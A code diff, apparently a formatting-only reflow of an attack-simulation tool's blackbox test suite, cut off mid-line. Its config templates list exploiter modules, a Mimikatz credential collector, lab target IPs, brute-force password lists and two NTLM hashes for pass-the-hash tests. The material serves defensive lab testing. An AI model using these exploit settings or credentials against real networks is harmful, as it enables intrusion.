a/envs/monkey_zoo/blackbox/config_templates/drupal.py +++ b/envs/monkey_zoo/blackbox/config_templates/drupal.py @@ -7,8 +7,10 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp class Drupal(ConfigTemplate): config_values = copy(BaseTemplate.config_values) - config_values.update({ - "internal.classes.finger_classes": ["PingScanner", "HTTPFinger"], - "basic.exploiters.exploiter_classes": ["DrupalExploiter"], - "basic_network.scope.subnet_scan_list": ["10.2.2.28"] - }) + config_values.update( + { + "internal.classes.finger_classes": ["PingScanner", "HTTPFinger"], + "basic.exploiters.exploiter_classes": ["DrupalExploiter"], + "basic_network.scope.subnet_scan_list": ["10.2.2.28"], + } + ) diff --git 
a/envs/monkey_zoo/blackbox/config_templates/elastic.py b/envs/monkey_zoo/blackbox/config_templates/elastic.py index 56021e959..43b276d53 100644 --- a/envs/monkey_zoo/blackbox/config_templates/elastic.py +++ b/envs/monkey_zoo/blackbox/config_templates/elastic.py @@ -8,8 +8,10 @@ class Elastic(ConfigTemplate): config_values = copy(BaseTemplate.config_values) - config_values.update({ - "basic.exploiters.exploiter_classes": ["ElasticGroovyExploiter"], - "internal.classes.finger_classes": ["PingScanner", "HTTPFinger", "ElasticFinger"], - "basic_network.scope.subnet_scan_list": ["10.2.2.4", "10.2.2.5"] - }) + config_values.update( + { + "basic.exploiters.exploiter_classes": ["ElasticGroovyExploiter"], + "internal.classes.finger_classes": ["PingScanner", "HTTPFinger", "ElasticFinger"], + "basic_network.scope.subnet_scan_list": ["10.2.2.4", "10.2.2.5"], + } + ) diff --git a/envs/monkey_zoo/blackbox/config_templates/hadoop.py b/envs/monkey_zoo/blackbox/config_templates/hadoop.py index d136068e5..86540bde6 100644 --- a/envs/monkey_zoo/blackbox/config_templates/hadoop.py +++ b/envs/monkey_zoo/blackbox/config_templates/hadoop.py @@ -8,7 +8,9 @@ class Hadoop(ConfigTemplate): config_values = copy(BaseTemplate.config_values) - config_values.update({ - "basic.exploiters.exploiter_classes": ["HadoopExploiter"], - "basic_network.scope.subnet_scan_list": ["10.2.2.2", "10.2.2.3"] - }) + config_values.update( + { + "basic.exploiters.exploiter_classes": ["HadoopExploiter"], + "basic_network.scope.subnet_scan_list": ["10.2.2.2", "10.2.2.3"], + } + ) diff --git a/envs/monkey_zoo/blackbox/config_templates/mssql.py b/envs/monkey_zoo/blackbox/config_templates/mssql.py index 003f9f8d3..61249044c 100644 --- a/envs/monkey_zoo/blackbox/config_templates/mssql.py +++ b/envs/monkey_zoo/blackbox/config_templates/mssql.py @@ -7,14 +7,16 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp class Mssql(ConfigTemplate): config_values = copy(BaseTemplate.config_values) - config_values.update({ - "basic.exploiters.exploiter_classes": ["MSSQLExploiter"], - "basic_network.scope.subnet_scan_list": ["10.2.2.16"], - "basic.credentials.exploit_password_list": ["Password1!", - "Xk8VDTsC", - "password", - "12345678"], - "basic.credentials.exploit_user_list": ["Administrator", - "m0nk3y", - "user"] - }) + config_values.update( + { + "basic.exploiters.exploiter_classes": ["MSSQLExploiter"], + "basic_network.scope.subnet_scan_list": ["10.2.2.16"], + "basic.credentials.exploit_password_list": [ + "Password1!", + "Xk8VDTsC", + "password", + "12345678", + ], + "basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"], + } + ) diff --git a/envs/monkey_zoo/blackbox/config_templates/performance.py b/envs/monkey_zoo/blackbox/config_templates/performance.py index e9e34727d..e5213b649 100644 --- a/envs/monkey_zoo/blackbox/config_templates/performance.py +++ b/envs/monkey_zoo/blackbox/config_templates/performance.py @@ -3,52 +3,60 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp class Performance(ConfigTemplate): config_values = { - "basic.credentials.exploit_password_list": ["Xk8VDTsC", - "^NgDvY59~8", - "Ivrrw5zEzs", - "3Q=(Ge(+&w]*", - "`))jU7L(w}", - "t67TC5ZDmz"], + "basic.credentials.exploit_password_list": [ + "Xk8VDTsC", + "^NgDvY59~8", + "Ivrrw5zEzs", + "3Q=(Ge(+&w]*", + "`))jU7L(w}", + "t67TC5ZDmz", + ], "basic.credentials.exploit_user_list": ["m0nk3y"], - "basic.exploiters.exploiter_classes": ["SmbExploiter", - "WmiExploiter", - "SSHExploiter", - 
"ShellShockExploiter", - "SambaCryExploiter", - "ElasticGroovyExploiter", - "Struts2Exploiter", - "WebLogicExploiter", - "HadoopExploiter", - "VSFTPDExploiter", - "MSSQLExploiter", - "ZerologonExploiter"], - "basic_network.network_analysis.inaccessible_subnets": ["10.2.2.0/30", - "10.2.2.8/30", - "10.2.2.24/32", - "10.2.2.23/32", - "10.2.2.21/32", - "10.2.2.19/32", - "10.2.2.18/32", - "10.2.2.17/32"], - "basic_network.scope.subnet_scan_list": ["10.2.2.2", - "10.2.2.3", - "10.2.2.4", - "10.2.2.5", - "10.2.2.8", - "10.2.2.9", - "10.2.1.10", - "10.2.0.11", - "10.2.0.12", - "10.2.2.11", - "10.2.2.12", - "10.2.2.14", - "10.2.2.15", - "10.2.2.16", - "10.2.2.18", - "10.2.2.19", - "10.2.2.20", - "10.2.2.21", - "10.2.2.23", - "10.2.2.24", - "10.2.2.25"] + "basic.exploiters.exploiter_classes": [ + "SmbExploiter", + "WmiExploiter", + "SSHExploiter", + "ShellShockExploiter", + "SambaCryExploiter", + "ElasticGroovyExploiter", + "Struts2Exploiter", + "WebLogicExploiter", + "HadoopExploiter", + "VSFTPDExploiter", + "MSSQLExploiter", + "ZerologonExploiter", + ], + "basic_network.network_analysis.inaccessible_subnets": [ + "10.2.2.0/30", + "10.2.2.8/30", + "10.2.2.24/32", + "10.2.2.23/32", + "10.2.2.21/32", + "10.2.2.19/32", + "10.2.2.18/32", + "10.2.2.17/32", + ], + "basic_network.scope.subnet_scan_list": [ + "10.2.2.2", + "10.2.2.3", + "10.2.2.4", + "10.2.2.5", + "10.2.2.8", + "10.2.2.9", + "10.2.1.10", + "10.2.0.11", + "10.2.0.12", + "10.2.2.11", + "10.2.2.12", + "10.2.2.14", + "10.2.2.15", + "10.2.2.16", + "10.2.2.18", + "10.2.2.19", + "10.2.2.20", + "10.2.2.21", + "10.2.2.23", + "10.2.2.24", + "10.2.2.25", + ], } diff --git a/envs/monkey_zoo/blackbox/config_templates/shellshock.py b/envs/monkey_zoo/blackbox/config_templates/shellshock.py index 71d968e0b..ba1a8f915 100644 --- a/envs/monkey_zoo/blackbox/config_templates/shellshock.py +++ b/envs/monkey_zoo/blackbox/config_templates/shellshock.py @@ -7,7 +7,9 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp class ShellShock(ConfigTemplate): config_values = copy(BaseTemplate.config_values) - config_values.update({ - "basic.exploiters.exploiter_classes": ["ShellShockExploiter"], - "basic_network.scope.subnet_scan_list": ["10.2.2.8"] - }) + config_values.update( + { + "basic.exploiters.exploiter_classes": ["ShellShockExploiter"], + "basic_network.scope.subnet_scan_list": ["10.2.2.8"], + } + ) diff --git a/envs/monkey_zoo/blackbox/config_templates/smb_mimikatz.py b/envs/monkey_zoo/blackbox/config_templates/smb_mimikatz.py index f563bc8d1..7a8d9060c 100644 --- a/envs/monkey_zoo/blackbox/config_templates/smb_mimikatz.py +++ b/envs/monkey_zoo/blackbox/config_templates/smb_mimikatz.py @@ -7,14 +7,18 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp class SmbMimikatz(ConfigTemplate): config_values = copy(BaseTemplate.config_values) - config_values.update({ - "basic.exploiters.exploiter_classes": ["SmbExploiter"], - "basic_network.scope.subnet_scan_list": ["10.2.2.14", "10.2.2.15"], - "basic.credentials.exploit_password_list": ["Password1!", "Ivrrw5zEzs"], - "basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"], - "internal.classes.finger_classes": ["SMBFinger", "PingScanner", "HTTPFinger"], - "monkey.system_info.system_info_collector_classes": ["EnvironmentCollector", - "HostnameCollector", - "ProcessListCollector", - "MimikatzCollector"] - }) + config_values.update( + { + "basic.exploiters.exploiter_classes": ["SmbExploiter"], + "basic_network.scope.subnet_scan_list": 
["10.2.2.14", "10.2.2.15"], + "basic.credentials.exploit_password_list": ["Password1!", "Ivrrw5zEzs"], + "basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"], + "internal.classes.finger_classes": ["SMBFinger", "PingScanner", "HTTPFinger"], + "monkey.system_info.system_info_collector_classes": [ + "EnvironmentCollector", + "HostnameCollector", + "ProcessListCollector", + "MimikatzCollector", + ], + } + ) diff --git a/envs/monkey_zoo/blackbox/config_templates/smb_pth.py b/envs/monkey_zoo/blackbox/config_templates/smb_pth.py index edee4cdbd..b8b54090d 100644 --- a/envs/monkey_zoo/blackbox/config_templates/smb_pth.py +++ b/envs/monkey_zoo/blackbox/config_templates/smb_pth.py @@ -11,12 +11,10 @@ class SmbPth(ConfigTemplate): "basic.exploiters.exploiter_classes": ["SmbExploiter"], "basic_network.scope.subnet_scan_list": ["10.2.2.15"], "basic.credentials.exploit_password_list": ["Password1!", "Ivrrw5zEzs"], - "basic.credentials.exploit_user_list": ["Administrator", - "m0nk3y", - "user"], - "internal.classes.finger_classes": ["SMBFinger", - "PingScanner", - "HTTPFinger"], - "internal.classes.exploits.exploit_ntlm_hash_list": ["5da0889ea2081aa79f6852294cba4a5e", - "50c9987a6bf1ac59398df9f911122c9b"] + "basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"], + "internal.classes.finger_classes": ["SMBFinger", "PingScanner", "HTTPFinger"], + "internal.classes.exploits.exploit_ntlm_hash_list": [ + "5da0889ea2081aa79f6852294cba4a5e", + "50c9987a6bf1ac59398df9f911122c9b", + ], } diff --git a/envs/monkey_zoo/blackbox/config_templates/ssh.py b/envs/monkey_zoo/blackbox/config_templates/ssh.py index 90871e52b..3cff3222a 100644 --- a/envs/monkey_zoo/blackbox/config_templates/ssh.py +++ b/envs/monkey_zoo/blackbox/config_templates/ssh.py @@ -7,17 +7,12 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp class Ssh(ConfigTemplate): config_values = copy(BaseTemplate.config_values) - config_values.update({ - "basic.exploiters.exploiter_classes": ["SSHExploiter"], - "basic_network.scope.subnet_scan_list": ["10.2.2.11", - "10.2.2.12"], - "basic.credentials.exploit_password_list": ["Password1!", - "12345678", - "^NgDvY59~8"], - "basic.credentials.exploit_user_list": ["Administrator", - "m0nk3y", - "user"], - "internal.classes.finger_classes": ["SSHFinger", - "PingScanner", - "HTTPFinger"] - }) + config_values.update( + { + "basic.exploiters.exploiter_classes": ["SSHExploiter"], + "basic_network.scope.subnet_scan_list": ["10.2.2.11", "10.2.2.12"], + "basic.credentials.exploit_password_list": ["Password1!", "12345678", "^NgDvY59~8"], + "basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"], + "internal.classes.finger_classes": ["SSHFinger", "PingScanner", "HTTPFinger"], + } + ) diff --git a/envs/monkey_zoo/blackbox/config_templates/struts2.py b/envs/monkey_zoo/blackbox/config_templates/struts2.py index 6eb399568..03b8ef38e 100644 --- a/envs/monkey_zoo/blackbox/config_templates/struts2.py +++ b/envs/monkey_zoo/blackbox/config_templates/struts2.py @@ -8,7 +8,9 @@ class Struts2(ConfigTemplate): config_values = copy(BaseTemplate.config_values) - config_values.update({ - "basic.exploiters.exploiter_classes": ["Struts2Exploiter"], - "basic_network.scope.subnet_scan_list": ["10.2.2.23", "10.2.2.24"] - }) + config_values.update( + { + "basic.exploiters.exploiter_classes": ["Struts2Exploiter"], + "basic_network.scope.subnet_scan_list": ["10.2.2.23", "10.2.2.24"], + } + ) diff --git a/envs/monkey_zoo/blackbox/config_templates/tunneling.py 
b/envs/monkey_zoo/blackbox/config_templates/tunneling.py index ac46eb110..d23ad8708 100644 --- a/envs/monkey_zoo/blackbox/config_templates/tunneling.py +++ b/envs/monkey_zoo/blackbox/config_templates/tunneling.py @@ -7,27 +7,30 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp class Tunneling(ConfigTemplate): config_values = copy(BaseTemplate.config_values) - config_values.update({ - "basic.exploiters.exploiter_classes": ["SmbExploiter", - "WmiExploiter", - "SSHExploiter" - ], - "basic_network.scope.subnet_scan_list": ["10.2.2.9", - "10.2.1.10", - "10.2.0.11", - "10.2.0.12"], - "basic_network.scope.depth": 3, - "internal.general.keep_tunnel_open_time": 180, - "basic.credentials.exploit_password_list": ["Password1!", - "3Q=(Ge(+&w]*", - "`))jU7L(w}", - "t67TC5ZDmz", - "12345678"], - "basic.credentials.exploit_user_list": ["Administrator", - "m0nk3y", - "user"], - "internal.classes.finger_classes": ["SSHFinger", - "PingScanner", - "HTTPFinger", - "SMBFinger"] - }) + config_values.update( + { + "basic.exploiters.exploiter_classes": ["SmbExploiter", "WmiExploiter", "SSHExploiter"], + "basic_network.scope.subnet_scan_list": [ + "10.2.2.9", + "10.2.1.10", + "10.2.0.11", + "10.2.0.12", + ], + "basic_network.scope.depth": 3, + "internal.general.keep_tunnel_open_time": 180, + "basic.credentials.exploit_password_list": [ + "Password1!", + "3Q=(Ge(+&w]*", + "`))jU7L(w}", + "t67TC5ZDmz", + "12345678", + ], + "basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"], + "internal.classes.finger_classes": [ + "SSHFinger", + "PingScanner", + "HTTPFinger", + "SMBFinger", + ], + } + ) diff --git a/envs/monkey_zoo/blackbox/config_templates/weblogic.py b/envs/monkey_zoo/blackbox/config_templates/weblogic.py index 482f7abf9..21b7eed0c 100644 --- a/envs/monkey_zoo/blackbox/config_templates/weblogic.py +++ b/envs/monkey_zoo/blackbox/config_templates/weblogic.py @@ -8,7 +8,9 @@ class Weblogic(ConfigTemplate): config_values = copy(BaseTemplate.config_values) - config_values.update({ - "basic.exploiters.exploiter_classes": ["WebLogicExploiter"], - "basic_network.scope.subnet_scan_list": ["10.2.2.18", "10.2.2.19"] - }) + config_values.update( + { + "basic.exploiters.exploiter_classes": ["WebLogicExploiter"], + "basic_network.scope.subnet_scan_list": ["10.2.2.18", "10.2.2.19"], + } + ) diff --git a/envs/monkey_zoo/blackbox/config_templates/wmi_mimikatz.py b/envs/monkey_zoo/blackbox/config_templates/wmi_mimikatz.py index b6dbc0c88..b23f73902 100644 --- a/envs/monkey_zoo/blackbox/config_templates/wmi_mimikatz.py +++ b/envs/monkey_zoo/blackbox/config_templates/wmi_mimikatz.py @@ -7,17 +7,17 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp class WmiMimikatz(ConfigTemplate): config_values = copy(BaseTemplate.config_values) - config_values.update({ - "basic.exploiters.exploiter_classes": ["WmiExploiter"], - "basic_network.scope.subnet_scan_list": ["10.2.2.14", - "10.2.2.15"], - "basic.credentials.exploit_password_list": ["Password1!", - "Ivrrw5zEzs"], - "basic.credentials.exploit_user_list": ["Administrator", - "m0nk3y", - "user"], - "monkey.system_info.system_info_collector_classes": ["EnvironmentCollector", - "HostnameCollector", - "ProcessListCollector", - "MimikatzCollector"] - }) + config_values.update( + { + "basic.exploiters.exploiter_classes": ["WmiExploiter"], + "basic_network.scope.subnet_scan_list": ["10.2.2.14", "10.2.2.15"], + "basic.credentials.exploit_password_list": ["Password1!", "Ivrrw5zEzs"], + 
"basic.credentials.exploit_user_list": ["Administrator", "m0nk3y", "user"], + "monkey.system_info.system_info_collector_classes": [ + "EnvironmentCollector", + "HostnameCollector", + "ProcessListCollector", + "MimikatzCollector", + ], + } + ) diff --git a/envs/monkey_zoo/blackbox/config_templates/zerologon.py b/envs/monkey_zoo/blackbox/config_templates/zerologon.py index 28afa281f..2eec0f4f0 100644 --- a/envs/monkey_zoo/blackbox/config_templates/zerologon.py +++ b/envs/monkey_zoo/blackbox/config_templates/zerologon.py @@ -8,9 +8,11 @@ class Zerologon(ConfigTemplate): config_values = copy(BaseTemplate.config_values) - config_values.update({ - "basic.exploiters.exploiter_classes": ["ZerologonExploiter"], - "basic_network.scope.subnet_scan_list": ["10.2.2.25"], - # Empty list to make sure ZeroLogon adds "Administrator" username - "basic.credentials.exploit_user_list": [] - }) + config_values.update( + { + "basic.exploiters.exploiter_classes": ["ZerologonExploiter"], + "basic_network.scope.subnet_scan_list": ["10.2.2.25"], + # Empty list to make sure ZeroLogon adds "Administrator" username + "basic.credentials.exploit_user_list": [], + } + ) diff --git a/envs/monkey_zoo/blackbox/conftest.py b/envs/monkey_zoo/blackbox/conftest.py index 4909bcbc7..21686f0fe 100644 --- a/envs/monkey_zoo/blackbox/conftest.py +++ b/envs/monkey_zoo/blackbox/conftest.py @@ -2,25 +2,37 @@ import pytest def pytest_addoption(parser): - parser.addoption("--island", action="store", default="", - help="Specify the Monkey Island address (host+port).") - parser.addoption("--no-gcp", action="store_true", default=False, - help="Use for no interaction with the cloud.") - parser.addoption("--quick-performance-tests", action="store_true", default=False, - help="If enabled performance tests won't reset island and won't send telemetries, " - "instead will just test performance of already present island state.") + parser.addoption( + "--island", + action="store", + default="", + help="Specify the Monkey Island address (host+port).", + ) + parser.addoption( + "--no-gcp", + action="store_true", + default=False, + help="Use for no interaction with the cloud.", + ) + parser.addoption( + "--quick-performance-tests", + action="store_true", + default=False, + help="If enabled performance tests won't reset island and won't send telemetries, " + "instead will just test performance of already present island state.", + ) -@pytest.fixture(scope='session') +@pytest.fixture(scope="session") def island(request): return request.config.getoption("--island") -@pytest.fixture(scope='session') +@pytest.fixture(scope="session") def no_gcp(request): return request.config.getoption("--no-gcp") -@pytest.fixture(scope='session') +@pytest.fixture(scope="session") def quick_performance_tests(request): return request.config.getoption("--quick-performance-tests") diff --git a/envs/monkey_zoo/blackbox/island_client/island_config_parser.py b/envs/monkey_zoo/blackbox/island_client/island_config_parser.py index 5b7211f87..8c7edaa58 100644 --- a/envs/monkey_zoo/blackbox/island_client/island_config_parser.py +++ b/envs/monkey_zoo/blackbox/island_client/island_config_parser.py @@ -8,23 +8,22 @@ from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemp class IslandConfigParser: - @staticmethod - def get_raw_config(config_template: Type[ConfigTemplate], - island_client: MonkeyIslandClient) -> str: + def get_raw_config( + config_template: Type[ConfigTemplate], island_client: MonkeyIslandClient + ) -> str: response = island_client.get_config() - 
config = IslandConfigParser.apply_template_to_config(config_template, response['configuration']) + config = IslandConfigParser.apply_template_to_config( + config_template, response["configuration"] + ) return json.dumps(config) @staticmethod - def apply_template_to_config(config_template: Type[ConfigTemplate], - config: dict) -> dict: + def apply_template_to_config(config_template: Type[ConfigTemplate], config: dict) -> dict: for path, value in config_template.config_values.items(): - dpath.util.set(config, path, value, '.') + dpath.util.set(config, path, value, ".") return config @staticmethod def get_ips_of_targets(raw_config): - return dpath.util.get(json.loads(raw_config), - "basic_network.scope.subnet_scan_list", - '.') + return dpath.util.get(json.loads(raw_config), "basic_network.scope.subnet_scan_list", ".") diff --git a/envs/monkey_zoo/blackbox/island_client/monkey_island_client.py b/envs/monkey_zoo/blackbox/island_client/monkey_island_client.py index 304996ebd..9ec54a56f 100644 --- a/envs/monkey_zoo/blackbox/island_client/monkey_island_client.py +++ b/envs/monkey_zoo/blackbox/island_client/monkey_island_client.py @@ -8,9 +8,9 @@ from bson import json_util from envs.monkey_zoo.blackbox.island_client.monkey_island_requests import MonkeyIslandRequests SLEEP_BETWEEN_REQUESTS_SECONDS = 0.5 -MONKEY_TEST_ENDPOINT = 'api/test/monkey' -TELEMETRY_TEST_ENDPOINT = 'api/test/telemetry' -LOG_TEST_ENDPOINT = 'api/test/log' +MONKEY_TEST_ENDPOINT = "api/test/monkey" +TELEMETRY_TEST_ENDPOINT = "api/test/telemetry" +LOG_TEST_ENDPOINT = "api/test/log" LOGGER = logging.getLogger(__name__) @@ -44,7 +44,7 @@ class MonkeyIslandClient(object): @staticmethod def monkey_ran_successfully(response): - return response.ok and json.loads(response.content)['is_running'] + return response.ok and json.loads(response.content)["is_running"] @avoid_race_condition def kill_all_monkeys(self): @@ -65,37 +65,41 @@ class MonkeyIslandClient(object): def find_monkeys_in_db(self, query): if query is None: raise TypeError - response = self.requests.get(MONKEY_TEST_ENDPOINT, - MonkeyIslandClient.form_find_query_for_request(query)) + response = self.requests.get( + MONKEY_TEST_ENDPOINT, MonkeyIslandClient.form_find_query_for_request(query) + ) return MonkeyIslandClient.get_test_query_results(response) def find_telems_in_db(self, query: dict): if query is None: raise TypeError - response = self.requests.get(TELEMETRY_TEST_ENDPOINT, - MonkeyIslandClient.form_find_query_for_request(query)) + response = self.requests.get( + TELEMETRY_TEST_ENDPOINT, MonkeyIslandClient.form_find_query_for_request(query) + ) return MonkeyIslandClient.get_test_query_results(response) def get_all_monkeys_from_db(self): - response = self.requests.get(MONKEY_TEST_ENDPOINT, - MonkeyIslandClient.form_find_query_for_request(None)) + response = self.requests.get( + MONKEY_TEST_ENDPOINT, MonkeyIslandClient.form_find_query_for_request(None) + ) return MonkeyIslandClient.get_test_query_results(response) def find_log_in_db(self, query): - response = self.requests.get(LOG_TEST_ENDPOINT, - MonkeyIslandClient.form_find_query_for_request(query)) + response = self.requests.get( + LOG_TEST_ENDPOINT, MonkeyIslandClient.form_find_query_for_request(query) + ) return MonkeyIslandClient.get_test_query_results(response) @staticmethod def form_find_query_for_request(query: Union[dict, None]) -> dict: - return {'find_query': json_util.dumps(query)} + return {"find_query": json_util.dumps(query)} @staticmethod def get_test_query_results(response): - return 
json.loads(response.content)['results'] + return json.loads(response.content)["results"] def is_all_monkeys_dead(self): - query = {'dead': False} + query = {"dead": False} return len(self.find_monkeys_in_db(query)) == 0 def clear_caches(self): diff --git a/envs/monkey_zoo/blackbox/island_client/monkey_island_requests.py b/envs/monkey_zoo/blackbox/island_client/monkey_island_requests.py index 226a0043c..4575f465e 100644 --- a/envs/monkey_zoo/blackbox/island_client/monkey_island_requests.py +++ b/envs/monkey_zoo/blackbox/island_client/monkey_island_requests.py @@ -8,8 +8,10 @@ import requests from envs.monkey_zoo.blackbox.island_client.supported_request_method import SupportedRequestMethod # SHA3-512 of '1234567890!@#$%^&*()_nothing_up_my_sleeve_1234567890!@#$%^&*()' -NO_AUTH_CREDS = '55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d2062' \ - '8d2c8d0b1538d2208c1444ac66535b764a3d902b35e751df3faec1e477ed3557' +NO_AUTH_CREDS = ( + "55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d2062" + "8d2c8d0b1538d2208c1444ac66535b764a3d902b35e751df3faec1e477ed3557" +) LOGGER = logging.getLogger(__name__) @@ -18,10 +20,12 @@ class MonkeyIslandRequests(object): def __init__(self, server_address): self.addr = "https://{IP}/".format(IP=server_address) self.token = self.try_get_jwt_from_server() - self.supported_request_methods = {SupportedRequestMethod.GET: self.get, - SupportedRequestMethod.POST: self.post, - SupportedRequestMethod.PATCH: self.patch, - SupportedRequestMethod.DELETE: self.delete} + self.supported_request_methods = { + SupportedRequestMethod.GET: self.get, + SupportedRequestMethod.POST: self.post, + SupportedRequestMethod.PATCH: self.patch, + SupportedRequestMethod.DELETE: self.delete, + } def get_request_time(self, url, method: SupportedRequestMethod, data=None): response = self.send_request_by_method(url, method, data) @@ -44,7 +48,10 @@ class MonkeyIslandRequests(object): return self.get_jwt_from_server() except requests.ConnectionError as err: LOGGER.error( - "Unable to connect to island, aborting! Error information: {}. Server: {}".format(err, self.addr)) + "Unable to connect to island, aborting! Error information: {}. 
Server: {}".format( + err, self.addr + ) + ) assert False class _Decorators: @@ -59,45 +66,45 @@ class MonkeyIslandRequests(object): return request_function_wrapper def get_jwt_from_server(self): - resp = requests.post(self.addr + "api/auth", # noqa: DUO123 - json={"username": NO_AUTH_CREDS, "password": NO_AUTH_CREDS}, - verify=False) + resp = requests.post( + self.addr + "api/auth", # noqa: DUO123 + json={"username": NO_AUTH_CREDS, "password": NO_AUTH_CREDS}, + verify=False, + ) return resp.json()["access_token"] @_Decorators.refresh_jwt_token def get(self, url, data=None): - return requests.get(self.addr + url, # noqa: DUO123 - headers=self.get_jwt_header(), - params=data, - verify=False) + return requests.get( + self.addr + url, # noqa: DUO123 + headers=self.get_jwt_header(), + params=data, + verify=False, + ) @_Decorators.refresh_jwt_token def post(self, url, data): - return requests.post(self.addr + url, # noqa: DUO123 - data=data, - headers=self.get_jwt_header(), - verify=False) + return requests.post( + self.addr + url, data=data, headers=self.get_jwt_header(), verify=False # noqa: DUO123 + ) @_Decorators.refresh_jwt_token def post_json(self, url, data: Dict): - return requests.post(self.addr + url, # noqa: DUO123 - json=data, - headers=self.get_jwt_header(), - verify=False) + return requests.post( + self.addr + url, json=data, headers=self.get_jwt_header(), verify=False # noqa: DUO123 + ) @_Decorators.refresh_jwt_token def patch(self, url, data: Dict): - return requests.patch(self.addr + url, # noqa: DUO123 - data=data, - headers=self.get_jwt_header(), - verify=False) + return requests.patch( + self.addr + url, data=data, headers=self.get_jwt_header(), verify=False # noqa: DUO123 + ) @_Decorators.refresh_jwt_token def delete(self, url): return requests.delete( # noqa: DOU123 - self.addr + url, - headers=self.get_jwt_header(), - verify=False) + self.addr + url, headers=self.get_jwt_header(), verify=False + ) @_Decorators.refresh_jwt_token def get_jwt_header(self): diff --git a/envs/monkey_zoo/blackbox/log_handlers/monkey_log.py b/envs/monkey_zoo/blackbox/log_handlers/monkey_log.py index b7f424a69..f49b199a1 100644 --- a/envs/monkey_zoo/blackbox/log_handlers/monkey_log.py +++ b/envs/monkey_zoo/blackbox/log_handlers/monkey_log.py @@ -12,16 +12,16 @@ class MonkeyLog(object): self.log_dir_path = log_dir_path def download_log(self, island_client): - log = island_client.find_log_in_db({'monkey_id': ObjectId(self.monkey['id'])}) + log = island_client.find_log_in_db({"monkey_id": ObjectId(self.monkey["id"])}) if not log: - LOGGER.error("Log for monkey {} not found".format(self.monkey['ip_addresses'][0])) + LOGGER.error("Log for monkey {} not found".format(self.monkey["ip_addresses"][0])) return False else: self.write_log_to_file(log) return True def write_log_to_file(self, log): - with open(self.get_log_path_for_monkey(self.monkey), 'w') as log_file: + with open(self.get_log_path_for_monkey(self.monkey), "w") as log_file: log_file.write(MonkeyLog.parse_log(log)) @staticmethod @@ -32,7 +32,7 @@ class MonkeyLog(object): @staticmethod def get_filename_for_monkey_log(monkey): - return "{}.txt".format(monkey['ip_addresses'][0]) + return "{}.txt".format(monkey["ip_addresses"][0]) def get_log_path_for_monkey(self, monkey): return os.path.join(self.log_dir_path, MonkeyLog.get_filename_for_monkey_log(monkey)) diff --git a/envs/monkey_zoo/blackbox/log_handlers/monkey_log_parser.py b/envs/monkey_zoo/blackbox/log_handlers/monkey_log_parser.py index 44804a1fd..6a046a474 100644 --- 
a/envs/monkey_zoo/blackbox/log_handlers/monkey_log_parser.py +++ b/envs/monkey_zoo/blackbox/log_handlers/monkey_log_parser.py @@ -5,13 +5,12 @@ LOGGER = logging.getLogger(__name__) class MonkeyLogParser(object): - def __init__(self, log_path): self.log_path = log_path self.log_contents = self.read_log() def read_log(self): - with open(self.log_path, 'r') as log: + with open(self.log_path, "r") as log: return log.read() def print_errors(self): diff --git a/envs/monkey_zoo/blackbox/log_handlers/monkey_logs_downloader.py b/envs/monkey_zoo/blackbox/log_handlers/monkey_logs_downloader.py index dbed46780..302da8fc7 100644 --- a/envs/monkey_zoo/blackbox/log_handlers/monkey_logs_downloader.py +++ b/envs/monkey_zoo/blackbox/log_handlers/monkey_logs_downloader.py @@ -6,7 +6,6 @@ LOGGER = logging.getLogger(__name__) class MonkeyLogsDownloader(object): - def __init__(self, island_client, log_dir_path): self.island_client = island_client self.log_dir_path = log_dir_path diff --git a/envs/monkey_zoo/blackbox/log_handlers/test_logs_handler.py b/envs/monkey_zoo/blackbox/log_handlers/test_logs_handler.py index bae6a9adc..55a242bec 100644 --- a/envs/monkey_zoo/blackbox/log_handlers/test_logs_handler.py +++ b/envs/monkey_zoo/blackbox/log_handlers/test_logs_handler.py @@ -5,7 +5,7 @@ import shutil from envs.monkey_zoo.blackbox.log_handlers.monkey_log_parser import MonkeyLogParser from envs.monkey_zoo.blackbox.log_handlers.monkey_logs_downloader import MonkeyLogsDownloader -LOG_DIR_NAME = 'logs' +LOG_DIR_NAME = "logs" LOGGER = logging.getLogger(__name__) @@ -18,8 +18,10 @@ class TestLogsHandler(object): def parse_test_logs(self): log_paths = self.download_logs() if not log_paths: - LOGGER.error("No logs were downloaded. Maybe no monkeys were ran " - "or early exception prevented log download?") + LOGGER.error( + "No logs were downloaded. Maybe no monkeys were ran " + "or early exception prevented log download?" 
+ ) return TestLogsHandler.parse_logs(log_paths) diff --git a/envs/monkey_zoo/blackbox/test_blackbox.py b/envs/monkey_zoo/blackbox/test_blackbox.py index bfcf32fba..303d0be52 100644 --- a/envs/monkey_zoo/blackbox/test_blackbox.py +++ b/envs/monkey_zoo/blackbox/test_blackbox.py @@ -5,13 +5,10 @@ from time import sleep import pytest from typing_extensions import Type -from envs.monkey_zoo.blackbox.analyzers.communication_analyzer import \ - CommunicationAnalyzer +from envs.monkey_zoo.blackbox.analyzers.communication_analyzer import CommunicationAnalyzer from envs.monkey_zoo.blackbox.analyzers.zerologon_analyzer import ZerologonAnalyzer -from envs.monkey_zoo.blackbox.island_client.island_config_parser import \ - IslandConfigParser -from envs.monkey_zoo.blackbox.island_client.monkey_island_client import \ - MonkeyIslandClient +from envs.monkey_zoo.blackbox.island_client.island_config_parser import IslandConfigParser +from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate from envs.monkey_zoo.blackbox.config_templates.drupal import Drupal from envs.monkey_zoo.blackbox.config_templates.elastic import Elastic @@ -28,33 +25,51 @@ from 